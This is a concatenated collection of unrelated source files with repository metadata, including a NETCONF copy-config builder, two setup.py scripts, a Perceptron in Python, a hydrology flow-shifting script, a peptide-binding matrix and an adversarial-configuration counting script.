        self.logger.debug("Building payload for 'copy_config' operation.")
        # only the *target* is validated; see the docstring note about source
        self._validate_edit_config_target(target=target)
        xml_request = self._build_base_elem()
        # NOTE(review): local is named xml_validate_element but holds the copy-config element
        xml_validate_element = etree.fromstring(
            NetconfBaseOperations.COPY_CONFIG.value.format(source=source, target=target),
            parser=self.xml_parser,
        )
        xml_request.insert(0, xml_validate_element)
        channel_input = self._finalize_channel_input(xml_request=xml_request)
        response = NetconfResponse(
            host=self.host,
            channel_input=channel_input.decode(),
            xml_input=xml_request,
            netconf_version=self.netconf_version,
            strip_namespaces=self.strip_namespaces,
        )
        self.logger.debug(
            f"Built payload for 'copy-config' operation. Payload: {channel_input.decode()}"
        )
        return response
| [
"hwane123@gmail.com"
] | hwane123@gmail.com |
c789bf1ce56799741bfb4bc22258282120e24113 | 0b5fa83ec76ec18ac72bcb38b2e62750db694a8c | /setup.py | 6606088b1e9ec27615b186152a47f116b5535497 | [
"MIT"
] | permissive | j1o1h1n/materialize-tornado-quickstart | e19834178e60bce07c6eca1467ceb4c347eacb55 | 43a62b86562094f8a8e0ce2e728f4fde1ac3ce69 | refs/heads/master | 2021-06-16T06:36:28.538772 | 2019-06-30T06:19:23 | 2019-06-30T06:19:23 | 193,901,472 | 0 | 0 | MIT | 2021-04-20T18:13:08 | 2019-06-26T12:37:24 | HTML | UTF-8 | Python | false | false | 1,780 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
# (regex, replacement) pairs applied in order to sanitize README.rst for PyPI,
# which does not render GitHub-specific reStructuredText extensions or badges.
PYPI_RST_FILTERS = (
    # Replace code-blocks
    (r'\.\.\s? code-block::\s*(\w|\+)+', '::'),
    # Replace image
    (r'\.\.\s? image::.*', ''),
    # Remove travis ci badge
    (r'.*travis-ci\.org/.*', ''),
    # Remove pypip.in badges
    (r'.*pypip\.in/.*', ''),
    (r'.*crate\.io/.*', ''),
    (r'.*coveralls\.io/.*', ''),
)
def rst(filename):
    '''
    Load rst file and sanitize it for PyPI.

    Remove unsupported github tags:
    - code-block directive
    - travis ci build badge

    Returns the sanitized file content as a string.
    '''
    # use a context manager so the file handle is closed deterministically
    # (the original relied on the garbage collector to close it)
    with open(filename) as f:
        content = f.read()
    for regex, replacement in PYPI_RST_FILTERS:
        content = re.sub(regex, replacement, content)
    return content
def required(filename):
    """Return the list of requirement lines contained in *filename*."""
    with open(filename) as req_file:
        return req_file.read().splitlines()
# Package registration; executed at import time, as is conventional for setup.py.
setup(
    name="materialize-tornado-quickstart",
    version="1.0.2",
    description="A quickstart template for a materializecss tornado webapp",
    long_description=rst("README.rst"),
    author="John Lehmann",
    author_email="j1o1h1n@yahoo.com",
    url="https://github.com/j1o1h1n/materialize-tornado-quickstart",
    license="MIT License",
    install_requires=required('requirements/base.txt'),
    setup_requires=[],
    tests_require=[
        'pytest',
    ],
    test_suite='tests',
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    scripts=[],
    entry_points={
        # exposes a `mywebapp` console command mapped to mywebapp.website:main
        'console_scripts': [
            "mywebapp = mywebapp.website:main",
        ],
    },
    classifiers=[
        'Programming Language :: Python',
    ],
)
| [
"j1o1h1n@gmail.com"
] | j1o1h1n@gmail.com |
b65e4101ce92995b1f2f4408b8c0ceed88f6c64e | 8675263285c0d246169aebe831ce461e6d94dec3 | /Qgen/timeShiftModel.py | 97c5531f624401de96074f9a39b0781ab2427ed2 | [] | no_license | ananya-g9/UCRB_analysis | 61ad7d8e7a34a7605a5c31088a09c02344a0e5d3 | fa6d74df139df419b57e8f6d288bbdcd4c5bbee4 | refs/heads/master | 2022-09-11T07:24:41.882730 | 2020-06-04T13:46:26 | 2020-06-04T13:46:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,910 | py | import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import matplotlib
def readFiles(filename, firstLine, numSites):
    """Read a StateMod-style monthly flow file and return the flows.

    Args:
        filename: path to the fixed-format flow file
        firstLine: number of header lines to skip
        numSites: number of gauge sites recorded per year in the file

    Returns:
        numpy.ndarray of shape (numYears, 12, numSites) of monthly flows.
    """
    # each data line holds "<year> <site> <12 monthly values>", with each value
    # terminated by '.', so splitting on '.' separates the monthly fields
    with open(filename, 'r') as f:
        all_split_data = [x.split('.') for x in f.readlines()]
    numYears = int((len(all_split_data) - firstLine) / numSites)
    MonthlyQ = np.zeros([12 * numYears, numSites])
    for i in range(numYears):
        for j in range(numSites):
            index = firstLine + i * numSites + j
            # the first '.'-field still contains "<year> <site> <first value>";
            # keep only the first monthly value
            all_split_data[index][0] = all_split_data[index][0].split()[2]
            # np.asfarray was removed in NumPy 2.0; asarray(..., dtype=float) is equivalent
            MonthlyQ[i * 12:(i + 1) * 12, j] = np.asarray(all_split_data[index][0:12], dtype=float)
    MonthlyQ = np.reshape(MonthlyQ, [int(np.shape(MonthlyQ)[0] / 12), 12, numSites])
    return MonthlyQ
def revertCumSum(cumulative):
    '''Invert a cumulative sum: return the increments whose running total
    reproduces *cumulative*.

    Modified from https://codereview.stackexchange.com/questions/117183/extracting-original-values-from-cumulative-sum-values

    Handles empty input (the original unconditionally assigned output[0],
    raising IndexError for an empty sequence).
    '''
    if len(cumulative) == 0:
        return []
    # first increment is the first cumulative value; each later increment is the
    # difference between consecutive cumulative values
    return [cumulative[0]] + [
        cumulative[i] - cumulative[i - 1] for i in range(1, len(cumulative))
    ]
# read in monthly flows at all sites (208 sites; 16 header lines in the .xbm file)
MonthlyQ = readFiles('cm2015x.xbm', 16, 208)
# LastNodeFractions[i, shift, month]: monthly fractional contribution at the last
# node for water years 1952-2013 (62 years) x 61 shift values x 12 months
LastNodeFractions = np.zeros([2013-1951,61,12])
for i in range(2013-1951):
    # shift 0 = observed monthly distribution of the naturalized flows
    LastNodeFractions[i,0,:] = MonthlyQ[43+i,:,-1]/np.sum(MonthlyQ[43+i,:,-1])
# read in daily flows at last node
LastNodeQ = pd.read_csv('CO_River_UT_State_line.csv')
LastNodeQ['Date'] = pd.to_datetime(LastNodeQ['Date'],format="%Y-%m-%d")
LastNodeQ['Year'] = LastNodeQ['Date'].dt.year
LastNodeQ['Month'] = LastNodeQ['Date'].dt.month
# increase year by 1 for Oct->Dec to convert to water year
indices = np.where(LastNodeQ['Month'] >= 10)[0]
LastNodeQ['Year'][indices] += 1
years = np.unique(LastNodeQ['Year'])
for year in years:
    flows = np.where(LastNodeQ['Year']==year)[0]
    plt.plot(range(len(flows)),LastNodeQ['Flow'][flows])
    #plt.savefig('Year' + str(year) + 'Hydrograph.png')
    #plt.clf()
# create column of dataframe for shifted flows
LastNodeQ['ShiftedFlow'] = LastNodeQ['Flow']
shifts = range(1,61) # example with 1 mo = 30 days
# NOTE(review): each iteration overwrites ShiftedFlow from the *original* Flow,
# so after this loop ShiftedFlow holds only the final (60-day) shift — confirm intended
for shift in shifts:
    LastNodeQ['ShiftedFlow'][0:-shift] = LastNodeQ['Flow'][shift::]
MonthlyTotals = LastNodeQ.set_index('Date').resample('M').sum()
MonthlyTotals['Year'] = MonthlyTotals.index.year
MonthlyTotals['Month'] = MonthlyTotals.index.month
# increase year by 1 for Oct->Dec to convert to water year (the original comment
# said "reduce year by 1 for Jan->Sept", which is not what this code does)
indices = np.where(MonthlyTotals['Month'] >= 10)[0]
MonthlyTotals['Year'][indices] += 1
# convert Monthly totals from cfs to acre-ft
MonthlyTotals['Flow'] = MonthlyTotals['Flow'] * 2.29569E-05 * 86400
MonthlyTotals['ShiftedFlow'] = MonthlyTotals['ShiftedFlow'] * 2.29569E-05 * 86400
for i in range(len(years)-1):
    year = years[i]
    flows = np.where(MonthlyTotals['Year']==year)[0]
    # calculate cumulative flows at gage w/ and w/o the shift, and of the naturalized flows
    gage_cdf = np.cumsum(MonthlyTotals['Flow'][flows])
    gage_shifted_cdf = np.cumsum(MonthlyTotals['ShiftedFlow'][flows])
    natural_cdf = np.cumsum(MonthlyQ[43+i,:,-1])
    # normalize cdfs to sum to 1
    gage_cdf = gage_cdf/np.max(gage_cdf)
    gage_shifted_cdf = gage_shifted_cdf/np.max(gage_shifted_cdf)
    natural_cdf = natural_cdf/np.max(natural_cdf)
    # apply same shift to natural flows as at gage
    natural_shifted_cdf = natural_cdf + gage_shifted_cdf - gage_cdf
    # compute monthly fractional contribution
    # NOTE(review): `shift` here is the leftover loop variable (60) from the loop
    # above, so only index 60 of the shift axis is written here — confirm intended
    LastNodeFractions[i,shift,:] = revertCumSum(natural_shifted_cdf)
# for each year, make a plot of the base and shifted hydrographs
cmap = matplotlib.cm.get_cmap('coolwarm')
for i in range(len(years)-1):
    plt.plot(MonthlyQ[43+i,:,-1])
    for shift in shifts:
        plt.plot(np.sum(MonthlyQ[43+i,:,-1]) * LastNodeFractions[i,shift,:], c=cmap(shift/61))
    #plt.savefig('ShiftedFlows/WY' + str(i+1951) + '.png')
    #plt.clf()
# for years 1909-1951, find nearest neighbor in terms of fractional contribution and apply same shifts
LastNodeFractions_preRecord = np.zeros([1952-1909,61,12])
for i in range(1952-1909):
    # squared distance between year i's monthly fraction profile and each post-1951 year
    d = np.zeros(2013-1951)
    for j in range(2013-1951):
        for k in range(12):
            d[j] += (MonthlyQ[i,k,-1]/np.sum(MonthlyQ[i,:,-1]) - MonthlyQ[j+43,k,-1]/np.sum(MonthlyQ[j+43,:,-1]))**2
    idx = np.argmin(d)
    LastNodeFractions_preRecord[i,:,:] = LastNodeFractions[idx,:,:]
# prepend LastNodeFractions_preRecord to LastNodeFractions
LastNodeFractions = np.concatenate((LastNodeFractions_preRecord,LastNodeFractions),0)
np.save('LastNodeFractions',LastNodeFractions)
"jquinn@DESKTOP-Q2B5352.localdomain"
] | jquinn@DESKTOP-Q2B5352.localdomain |
81c5cd967cb9946b4d31ca4175e77772cb7a9538 | 7b62bc3cdb002d193c70b48dfe3decfe347aa551 | /04_example/01_face_detection/src/rcnn/cython/setup.py | 455368769bf9563c9ce72dd4e0d3be90e62c3606 | [] | no_license | gaohank/python-coding-proj | 09961f334340c82c953b0d04a124e7d6c45a9086 | 0cf0aaae24c80326c0c09a3aa9dd2251f9928b61 | refs/heads/master | 2021-01-14T06:08:23.686766 | 2020-06-29T00:41:53 | 2020-06-29T00:41:53 | 242,491,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,056 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
from os.path import join as pjoin
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy as np
def find_in_path(name, path):
    """Find a file in a search path.

    Args:
        name: file name to look for
        path: os.pathsep-separated search path (e.g. the value of $PATH)

    Returns:
        Absolute path of the first match, or None when not found.
    """
    # Adapted fom
    # http://code.activestate.com/recipes/52224-find-a-file-given-a-search-path/
    # loop variable renamed from `dir` to avoid shadowing the builtin
    for directory in path.split(os.pathsep):
        binpath = pjoin(directory, name)
        if os.path.exists(binpath):
            return os.path.abspath(binpath)
    return None
def locate_cuda():
    """Locate the CUDA environment on the system.

    Returns a dict with keys 'home', 'nvcc', 'include', and 'lib64'
    and values giving the absolute path to each directory.

    The CUDAHOME environment variable takes precedence; otherwise the PATH
    (plus the conventional /usr/local/cuda/bin) is searched for nvcc.
    """
    cuda_home = os.environ.get('CUDAHOME')
    if cuda_home is not None:
        nvcc_path = pjoin(cuda_home, 'bin', 'nvcc')
    else:
        # fall back to searching the PATH for the nvcc binary
        fallback_bin = pjoin(os.sep, 'usr', 'local', 'cuda', 'bin')
        nvcc_path = find_in_path('nvcc', os.environ['PATH'] + os.pathsep + fallback_bin)
        if nvcc_path is None:
            raise EnvironmentError('The nvcc binary could not be '
                'located in your $PATH. Either add it to your path, or set $CUDAHOME')
        cuda_home = os.path.dirname(os.path.dirname(nvcc_path))

    cudaconfig = {'home': cuda_home, 'nvcc': nvcc_path,
                  'include': pjoin(cuda_home, 'include'),
                  'lib64': pjoin(cuda_home, 'lib64')}
    # every expected directory must actually exist
    for key, value in cudaconfig.items():
        if not os.path.exists(value):
            raise EnvironmentError('The CUDA %s path could not be located in %s' % (key, value))

    return cudaconfig
# Test if cuda could be found; CUDA stays None when unavailable so the GPU
# extension can be skipped instead of failing the whole build
try:
    CUDA = locate_cuda()
except EnvironmentError:
    CUDA = None
# Obtain the numpy include directory. This logic works across numpy versions.
try:
    numpy_include = np.get_include()
except AttributeError:
    numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
    """inject deep into distutils to customize how the dispatch
    to gcc/nvcc works.
    If you subclass UnixCCompiler, it's not trivial to get your subclass
    injected in, and still have the right customizations (i.e.
    distutils.sysconfig.customize_compiler) run on it. So instead of going
    the OO route, I have this. Note, it's kindof like a wierd functional
    subclassing going on."""
    # tell the compiler it can processes .cu
    self.src_extensions.append('.cu')
    # save references to the default compiler_so and _compile methods
    # Note 1: no .so shared-object handling on Windows, so the original
    # compiler_so save/restore is commented out
    # default_compiler_so = self.compiler_so
    # `super` deliberately shadows the builtin here: it keeps the original
    # _compile bound method so the replacement below can delegate to it
    super = self._compile
    # now redefine the _compile method. This gets executed for each
    # object but distutils doesn't have the ability to change compilers
    # based on source extension: we add it.
    def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
        if os.path.splitext(src)[1] == '.cu':
            # use the cuda for .cu files
            self.set_executable('compiler_so', CUDA['nvcc'])
            # use only a subset of the extra_postargs, which are 1-1 translated
            # from the extra_compile_args in the Extension class
            postargs = extra_postargs['nvcc']
        else:
            postargs = extra_postargs['gcc']
        super(obj, src, ext, cc_args, postargs, pp_opts)
        # Note 1 (same as above): compiler_so restore skipped on Windows
        # self.compiler_so = default_compiler_so
    # inject our redefined _compile method into the class
    self._compile = _compile
# Note 2: nvcc compile args; NVCCFLAGS from the environment are prepended
nvcc_compile_args = ['-O', '--ptxas-options=-v', '-arch=sm_35', '-c', '--compiler-options=-fPIC']
nvcc_compile_args = os.environ.get('NVCCFLAGS', '').split() + nvcc_compile_args
# build_ext subclass that patches the compiler (see customize_compiler_for_nvcc)
# before delegating to the stock build
class custom_build_ext(build_ext):
    def build_extensions(self):
        customize_compiler_for_nvcc(self.compiler)
        build_ext.build_extensions(self)
# CPU-only Cython extensions; each compiles against the numpy headers
ext_modules = [
    Extension(
        "bbox",
        ["bbox.pyx"],
        extra_compile_args=nvcc_compile_args,
        include_dirs=[numpy_include]
    ),
    Extension(
        "anchors",
        ["anchors.pyx"],
        extra_compile_args=nvcc_compile_args,
        include_dirs=[numpy_include]
    ),
    Extension(
        "cpu_nms",
        ["cpu_nms.pyx"],
        extra_compile_args=nvcc_compile_args,
        include_dirs=[numpy_include]
    ),
]
# the GPU NMS extension is only built when a CUDA toolchain was located above
if CUDA is not None:
    ext_modules.append(
        Extension('gpu_nms',
                  ['nms_kernel.cu', 'gpu_nms.pyx'],
                  library_dirs=[CUDA['lib64']],
                  libraries=['cudart'],
                  language='c++',
                  runtime_library_dirs=[CUDA['lib64']],
                  # this syntax is specific to this build system
                  # we're only going to use certain compiler args with nvcc and not with
                  # gcc the implementation of this trick is in customize_compiler() below
                  extra_compile_args={'gcc': ["-Wno-unused-function"],
                                      'nvcc': ['-arch=sm_35',
                                               '--ptxas-options=-v',
                                               '-c',
                                               '--compiler-options',
                                               "'-fPIC'"]},
                  include_dirs=[numpy_include, CUDA['include']]
                  )
    )
else:
    print('Skipping GPU_NMS')
setup(
    name='frcnn_cython',
    ext_modules=ext_modules,
    # inject our custom trigger
    cmdclass={'build_ext': custom_build_ext},
)
| [
"songling.gao@ikang.com"
] | songling.gao@ikang.com |
5abea72a01aa40f4004899a546be474be23f30d4 | 8f263874dc2d5c15c79417301f8dd21176129f86 | /python_tips/Perceptron.py | 5a7da05f0ed44c12e52a3529be2322135c722146 | [
"BSD-3-Clause"
] | permissive | LucasDatilioCarderelli/examples | 8768bbd303f6216ce08e0c95f6efbeabf4a003e7 | d1847272384723d7f4bb233e5947ff1f1ddfe781 | refs/heads/master | 2022-11-11T16:55:41.293787 | 2020-06-22T03:12:35 | 2020-06-22T03:12:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,566 | py | '''
Este projeto esta disponivel no GiHub de Marcos castro de Sousa
Implementação da rede neural Perceptron
w = w + N * (d(k) - y) * x(k)
'''
import random, copy
class Perceptron:
    # Classic single-layer Perceptron with a bipolar step activation.
    # Weight update rule: w = w + N * (d(k) - y) * x(k)
    def __init__(self, amostras, saidas, taxa_aprendizado=0.1, epocas=1000, limiar=-1):
        self.amostras = amostras # all training samples
        self.saidas = saidas # desired output of each sample
        self.taxa_aprendizado = taxa_aprendizado # learning rate (between 0 and 1)
        self.epocas = epocas # maximum number of epochs
        self.limiar = limiar # threshold (bias weight)
        self.num_amostras = len(amostras) # number of samples
        self.num_amostra = len(amostras[0]) # number of features per sample
        self.pesos = [] # weight vector
    # train the network; NOTE: mutates self.amostras by prepending the bias input -1
    def treinar(self):
        # prepend the bias input -1 to every sample
        for amostra in self.amostras:
            amostra.insert(0, -1)
        # initialize the weight vector with random values
        for i in range(self.num_amostra):
            self.pesos.append(random.random())
        # prepend the threshold to the weight vector
        self.pesos.insert(0, self.limiar)
        # epoch counter
        num_epocas = 0
        while True:
            erro = False # no error seen yet this epoch
            # for every training sample
            for i in range(self.num_amostras):
                u = 0
                '''
                realiza o somatório, o limite (self.amostra + 1)
                é porque foi inserido o -1 para cada amostra
                '''
                # weighted sum; the (self.num_amostra + 1) limit accounts for the
                # prepended -1 bias input on each sample
                for j in range(self.num_amostra + 1):
                    u += self.pesos[j] * self.amostras[i][j]
                # network output through the activation function
                y = self.sinal(u)
                # check whether the network output differs from the desired output
                if y != self.saidas[i]:
                    # error: desired output minus network output
                    erro_aux = self.saidas[i] - y
                    # adjust every weight using this sample's inputs
                    for j in range(self.num_amostra + 1):
                        self.pesos[j] = self.pesos[j] + self.taxa_aprendizado * erro_aux * self.amostras[i][j]
                    erro = True # an error still exists
            # one more epoch completed
            num_epocas += 1
            # stop when the epoch budget is exhausted or no error remains
            if num_epocas > self.epocas or not erro:
                break
    # classify one sample and print which of the two class names it belongs to;
    # uses the sign function: -1 -> classe1, otherwise classe2
    # NOTE: mutates `amostra` by prepending the bias input -1
    def testar(self, amostra, classe1, classe2):
        # prepend the bias input
        amostra.insert(0, -1)
        # use the weight vector adjusted during the training phase
        u = 0
        for i in range(self.num_amostra + 1):
            u += self.pesos[i] * amostra[i]
        # compute the network output
        y = self.sinal(u)
        # report which class the sample belongs to
        if y == -1:
            print('A amostra pertence a classe %s' % classe1)
        else:
            print('A amostra pertence a classe %s' % classe2)
    # activation function: bipolar step (sign)
    def sinal(self, u):
        return 1 if u >= 0 else -1
if __name__ == "__main__":
print('\nA ou B?\n')
# amostras: um total de 4 amostras
amostras = [[0.1, 0.4, 0.7], [0.3, 0.7, 0.2],
[0.6, 0.9, 0.8], [0.5, 0.7, 0.1]]
# saídas desejadas de cada amostra
saidas = [1, -1, -1, 1]
# conjunto de amostras de testes
testes = copy.deepcopy(amostras)
# cria uma rede Perceptron
rede = Perceptron(amostras=amostras, saidas=saidas,
taxa_aprendizado=0.1, epocas=1000)
# treina a rede
rede.treinar()
# testando a rede
for teste in testes:
rede.testar(teste, 'A', 'B') | [
"prof.israel@gmail.com"
] | prof.israel@gmail.com |
d2ae07fd11fe4e1e7d1743d988d4927f80c9e409 | d4b49195beba64afee0b6bbffdca304a9bd7e25e | /3_Deep_Learning_Registration/requirements.py | aa64d23d01901c1a8786ce443cfafbf5b821653f | [] | no_license | xiaolifeimianbao/Tutorial-Medical-Image-Registration | 6921256a25f3a8f9595acc03a06237d80efce2cc | 7ea9803e0a2457416f613d94640155dfc88e410a | refs/heads/master | 2022-04-05T07:41:00.966706 | 2019-12-28T23:39:02 | 2019-12-28T23:39:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # VERSION 0.0.0
# ------ AUTHOR: NaTaN ANDRADE ------
# Universidade Federal de São Paulo (UNIFESP)
# Instituto de Ciência e Tecnologia (ICT)
# São José dos Campos (SJC)
# Estado de São Paulo (SP)
# BRASIL
# To install these dependencies (e.g. inside a virtualenv): pip install -r requirements.txt
pip install tensorflow
pip install tensorflow-gpu
pip install keras
pip install dltk
pip install niftynet
pip install SimpleITK
pip install sympy
pip install nibabel
pip install pydicom
pip install medpy
pip install -U scikit-learn
pip install pydot
pip install graphviz
| [
"noreply@github.com"
] | noreply@github.com |
52875bb3e78a1bda06ee3642b5d4c9156ba64ac9 | 55b57d64ec547869835334318f3059fbb507558c | /Fred2/Data/pssms/tepitopepan/mat/DRB1_0480_9.py | f6f1ff603742b33032918eb4444a0a117596dd3a | [
"BSD-3-Clause"
] | permissive | FRED-2/Fred2 | 9845f6678d4011cb746c7a5a6f283eea68077a02 | b3e54c8c4ed12b780b61f74672e9667245a7bb78 | refs/heads/master | 2021-07-12T05:05:54.515427 | 2020-05-25T06:56:25 | 2020-05-25T06:56:25 | 16,275,425 | 42 | 35 | null | 2021-07-07T12:05:11 | 2014-01-27T10:08:11 | Python | UTF-8 | Python | false | false | 2,169 | py | DRB1_0480_9 = {0: {'A': -999.0, 'E': -999.0, 'D': -999.0, 'G': -999.0, 'F': -0.004754, 'I': -0.99525, 'H': -999.0, 'K': -999.0, 'M': -0.99525, 'L': -0.99525, 'N': -999.0, 'Q': -999.0, 'P': -999.0, 'S': -999.0, 'R': -999.0, 'T': -999.0, 'W': -0.004754, 'V': -0.99525, 'Y': -0.004754}, 1: {'A': 0.0, 'E': 0.1, 'D': -1.3, 'G': 0.5, 'F': 0.8, 'I': 1.1, 'H': 0.8, 'K': 1.1, 'M': 1.1, 'L': 1.0, 'N': 0.8, 'Q': 1.2, 'P': -0.5, 'S': -0.3, 'R': 2.2, 'T': 0.0, 'W': -0.1, 'V': 2.1, 'Y': 0.9}, 2: {'A': 0.0, 'E': -1.2, 'D': -1.3, 'G': 0.2, 'F': 0.8, 'I': 1.5, 'H': 0.2, 'K': 0.0, 'M': 1.4, 'L': 1.0, 'N': 0.5, 'Q': 0.0, 'P': 0.3, 'S': 0.2, 'R': 0.7, 'T': 0.0, 'W': 0.0, 'V': 0.5, 'Y': 0.8}, 3: {'A': 0.0, 'E': -0.33143, 'D': -0.36514, 'G': -2.0591, 'F': 0.36585, 'I': 0.95537, 'H': -0.2281, 'K': -1.4856, 'M': 1.4546, 'L': 0.86213, 'N': -0.17568, 'Q': 0.23244, 'P': -1.3948, 'S': -0.23788, 'R': -2.0746, 'T': -0.3733, 'W': -0.34023, 'V': -0.00016686, 'Y': -0.77543}, 4: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 5: {'A': 0.0, 'E': -2.3798, 'D': -1.1245, 'G': -1.483, 'F': -1.1051, 'I': -0.084718, 'H': -1.3744, 'K': -2.3275, 'M': -1.0952, 'L': -1.0742, 'N': 1.263, 'Q': -1.4765, 'P': 0.0093511, 'S': 0.97855, 'R': -2.3322, 'T': 1.8771, 'W': -1.0072, 'V': 0.90462, 'Y': -1.4966}, 6: {'A': 0.0, 'E': -0.70382, 'D': -1.2017, 'G': -1.1093, 'F': -0.366, 'I': 0.042256, 'H': -0.31036, 'K': -0.86425, 'M': 0.6483, 'L': 0.42064, 'N': 0.34102, 'Q': -0.25364, 'P': -0.85722, 'S': -0.020483, 'R': -0.81007, 'T': -0.15788, 'W': 
-0.83077, 'V': -0.16921, 'Y': -0.51701}, 7: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 8: {'A': 0.0, 'E': -0.29158, 'D': -0.43532, 'G': -0.37531, 'F': -0.55063, 'I': -0.19134, 'H': 0.63181, 'K': -0.62119, 'M': 0.13433, 'L': -0.5213, 'N': -0.46339, 'Q': 0.85581, 'P': -1.0975, 'S': 0.70702, 'R': -0.97291, 'T': -0.77221, 'W': -0.58512, 'V': -0.54344, 'Y': -0.46934}} | [
"schubert@informatik.uni-tuebingen.de"
] | schubert@informatik.uni-tuebingen.de |
c3a8be6b31ad7be0593c0e31bb22f7c2ab3432ad | a9f3b1cbf04b78a79d66a7ab713e497262d4ca11 | /ex1.py | ed18fb454da2b1adf56958f417b944e700a7eb4a | [] | no_license | nehptune/LPTHW | 18aea7c24ee95758286d5eec6c612c194bd00e35 | 0c21992e783b920539f68277da3392de61d949bd | refs/heads/master | 2021-01-22T23:53:47.324593 | 2013-07-04T21:42:57 | 2013-07-04T21:42:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | print "Hello World!"
#print "Hello Again"
#print "I like typing this."
#print "This is fun."
#print "Yay! Printing."
#print "I'd much rather you 'not'."
#print 'I "said" do not touch this.'
#print "here goes another line..."
| [
"sophie.clayton@gmail.com"
] | sophie.clayton@gmail.com |
03141166a5bda5723952bf49f8c51c0d52f15fc7 | 43c24c890221d6c98e4a45cd63dba4f1aa859f55 | /test/tests/assign_empty_list.py | a0b6e7f7ede213462c6b0daa209159a69c6f24cb | [
"Python-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | jmgc/pyston | c8e4df03c33c6b81d20b7d51a781d9e10148238e | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | refs/heads/master | 2020-12-11T07:51:58.968440 | 2020-09-11T14:38:38 | 2020-09-11T14:38:38 | 39,242,644 | 0 | 0 | NOASSERTION | 2020-09-11T14:38:39 | 2015-07-17T08:09:31 | Python | UTF-8 | Python | false | false | 8 | py | [] = []
| [
"daekharel@gmail.com"
] | daekharel@gmail.com |
0be6318f0912ecd7eb2f410d4e3b25c8748e7aee | 702feb18a94847b2bcb2ee0e145735ac997bcb96 | /scripts/RQ1.4/script_eval_nb_valid_attack_nonacc.py | e8765a061cd9c3b9ea495f3c35dd3a55a95bd763 | [] | no_license | templep/SPLC_2019 | daa7f8c4b1f4bb0a2bb00ee2cfd329cbdbdc45d0 | a74029072f213853f8c866613208e3de8fd94e91 | refs/heads/master | 2020-05-04T07:01:00.040275 | 2019-06-25T08:11:22 | 2019-06-25T08:11:22 | 179,019,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,939 | py | import numpy as np
from os import path
import glob
import sys
##adv attack
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*_20_label_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*50_label_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*100_label_nonacc.csv")
##random attack
#filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*20_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*50_nonacc.csv")
filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*100_nonacc.csv")
#print (filenames)
for f in filenames:
nb_failed=0
data=np.genfromtxt(f,delimiter=",")
data_attack=data[489:,:]
for l in data_attack:
if (l[0] > 16) or (l[1] > 8) or (l[2] > 16) or (l[3] > 8) or (l[4] > 16) or (l[5] > 8) or (l[6] > 16) or (l[7] > 8) or (l[8] > 16) or (l[9] > 8) or (l[10] < 0) or (l[10] > 1) or (l[11] < 0) or (l[11] > 1) or (l[12] < 0) or (l[12] > 1) or (l[13] < 0) or (l[13] > 1) or (l[14] < 0) or (l[14] > 1) or (l[15] < 0) or (l[15] > 1) or (l[16] < 0) or (l[16] > 1) or (l[17] < 0) or (l[17] > 1) or (l[18] < 0) or (l[18] > 1) or (l[19] < 0) or (l[19] > 1) or (l[20] < 0) or (l[20] > 1) or (l[21] < 0) or (l[21] > 1) or (l[22] < 0) or (l[22] > 1) or (l[29] < 0) or (l[29] > 1) or (l[30] < 0) or (l[30] > 1) or (l[31] < 0) or (l[31] > 1) or (l[32] < 0) or (l[32] > 1) or (l[33] < 0) or (l[33] > 1) or (l[34] < 0) or (l[34] > 1):
nb_failed +=1
output_f=path.basename(f)
output=open("../../results/4000_gen_adv_config/result_valid_attack/adv_attack_norm/"+output_f,"w")
#output=open("../../results/4000_gen_adv_config/result_valid_attack/random_attack_norm/"+output_f,"w")
orig_stdout = sys.stdout
sys.stdout = output
print ("nb invalid attack: "+str(nb_failed))
print ("nb valid attack: "+str(4000-nb_failed))
sys.stdout = orig_stdout
output.close()
| [
"ptemple@pctemple.irisa.fr"
] | ptemple@pctemple.irisa.fr |
3d57065134a29be5a98705c8f7af7bd511c0c906 | 2d2b86d57ed11c375a98754556968571f37342cc | /src/tf_idf/get_tf_idf_doc.py | 9e5799f0f2bd990d4d7227cc17e131d3ad4f08d3 | [] | no_license | FeixLiu/506_2020_midterm | 7341134db3fc563306ce207512623518a7b978ff | d88e98635197ae8f16c6869b80b39c85e546a48b | refs/heads/master | 2022-04-19T07:40:43.086193 | 2020-03-21T17:59:43 | 2020-03-21T19:17:23 | 249,031,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py | import csv
import re
import math
from sklearn.feature_extraction.text import CountVectorizer
path = '../data/train.csv'
